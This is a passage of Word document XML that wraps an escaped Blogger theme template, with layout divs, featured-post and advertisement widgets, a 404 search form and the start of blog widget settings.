        <w:t xml:space="preserve">                        &lt;div class='fauxborder-left'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          &lt;div class='fauxborder-right'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          &lt;div class='fauxcolumn-inner'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        &lt;div class='cap-bottom'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          &lt;div class='cap-left'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          &lt;div class='cap-right'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      &lt;div class='fauxcolumn-outer fauxcolumn-left-outer'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        &lt;div class='cap-top'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          &lt;div class='cap-left'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          &lt;div class='cap-right'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        &lt;div class='fauxborder-left'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          &lt;div class='fauxborder-right'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          &lt;div class='fauxcolumn-inner'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        &lt;div class='cap-bottom'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          &lt;div class='cap-left'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          &lt;div class='cap-right'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      &lt;div class='fauxcolumn-outer fauxcolumn-right-outer'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        &lt;div class='cap-top'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          &lt;div class='cap-left'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          &lt;div class='cap-right'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        &lt;div class='fauxborder-left'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          &lt;div class='fauxborder-right'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          &lt;div class='fauxcolumn-inner'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        &lt;div class='cap-bottom'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          &lt;div class='cap-left'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          &lt;div class='cap-right'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      &lt;!-- corrects IE6 width calculation --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      &lt;div class='columns-inner'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        &lt;div class='wrapper backface'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          &lt;div class='container'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                            &lt;div class='row'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              &lt;div class='col-sm-12'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                &lt;div class='widgetarea'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  &lt;b:section class='melesa-featured' id='melesa-featured' name='Featured Post Widget' showaddelement='no'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    &lt;b:widget id='HTML997' locked='false' title='Featured Widget' type='HTML' version='1'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      &lt;b:widget-settings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;b:widget-setting name='content'&gt;&lt;![CDATA[&lt;object id="demo-feat" class="Umah_Belajar" data-label="travel" data-type="grid-3"&gt;&lt;/object&gt;]]&gt;&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      &lt;/b:widget-settings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      &lt;b:includable id='main'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;div class='widget-content'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;data:content/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          //&lt;![CDATA[</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          function getstring(name, url) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            if (!url) url = window.location.href;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            name = name.replace(/[\[\]]/g, "\\$&amp;");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            var regex = new RegExp("[?&amp;]" + name + "(=([^&amp;#]*)|&amp;|#|$)"),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                results = regex.exec(url);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            if (!results) return null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            if (!results[2]) return '';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            return decodeURIComponent(results[2].replace(/\+/g, " "));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          var getfeat = getstring('feat');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          if((getfeat != null) &amp;&amp; (getfeat != '')){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                            document.getElementById('demo-feat').setAttribute("data-type", getfeat); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          //]]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;b:include name='quickedit'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    &lt;/b:widget&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  &lt;/b:section&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            &lt;div class='row'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              &lt;div class='col-sm-12'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                &lt;div class='widgetarea-advert'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  &lt;b:section class='melesa-advert' id='melesa-advert' name='Avertisement Banner [TOP]' showaddelement='no'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    &lt;b:widget id='HTML996' locked='false' title='Advertisement' type='HTML' version='1'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      &lt;b:widget-settings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;b:widget-setting name='content'&gt;&lt;![CDATA[&lt;a href="javascript:void(0);"&gt;&lt;img src="https://3.bp.blogspot.com/-prrYJPXbeFM/XYLwXpOmgjI/AAAAAAAAABQ/l8K1Nm68vnQSzd6WARUQ5uVnuIOhnjkOgCLcBGAsYHQ/s320/umah%2Bbelajar.jpg "/&gt;&lt;/a&gt;]]&gt;&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      &lt;/b:widget-settings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      &lt;b:includable id='main'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;div class='widget-content'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;data:content/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;b:include name='quickedit'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    &lt;/b:widget&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  &lt;/b:section&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            &lt;div class='row'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              &lt;b:if cond='data:blog.pageType == &amp;quot;error_page&amp;quot;'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                &lt;div class='col-sm-12'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  &lt;div class='melesa-404'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    &lt;div id='melesa-404'&gt;&lt;h3&gt;It looks like nothing was found at this location. Maybe try a search?&lt;/h3&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    &lt;form action='/search' class='searchform' method='get'&gt;&lt;div class='input-group'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      &lt;input class='form-control' name='q' placeholder='Search ... ' type='text' value=''/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      &lt;span class='input-group-btn'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;button class='btn btn-primary'&gt;&lt;i class='ion-ios-search'/&gt;&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      &lt;/span&gt;&lt;/div&gt;&lt;div/&gt;&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                &lt;style&gt;#left-sidebar-area,#right-sidebar-area,#content-area{display:none}&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              &lt;div class='col-md-8' id='content-area'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                &lt;div class='column-center-outer'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  &lt;div class='column-center-inner'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    &lt;b:section class='main' id='main' name='Main' showaddelement='no'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      &lt;b:widget id='Blog1' locked='false' title='Posting Blog' type='Blog' version='1'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;b:widget-settings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;b:widget-setting name='showDateHeader'&gt;true&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;b:widget-setting name='style.textcolor'&gt;#5b5b60&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;b:widget-setting name='showShareButtons'&gt;true&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;b:widget-setting name='authorLabel'&gt;By&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;b:widget-setting name='showCommentLink'&gt;true&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;b:widget-setting name='style.urlcolor'&gt;#ffffff&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;b:widget-setting name='showAuthor'&gt;true&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;b:widget-setting name='disableGooglePlusShare'&gt;true&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;b:widget-setting name='style.linkcolor'&gt;#ff8989&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;b:widget-setting name='style.unittype'&gt;TextAndImage&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;b:widget-setting name='style.bgcolor'&gt;#000000&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;b:widget-setting name='showAuthorProfile'&gt;false&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;b:widget-setting name='style.layout'&gt;1x1&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
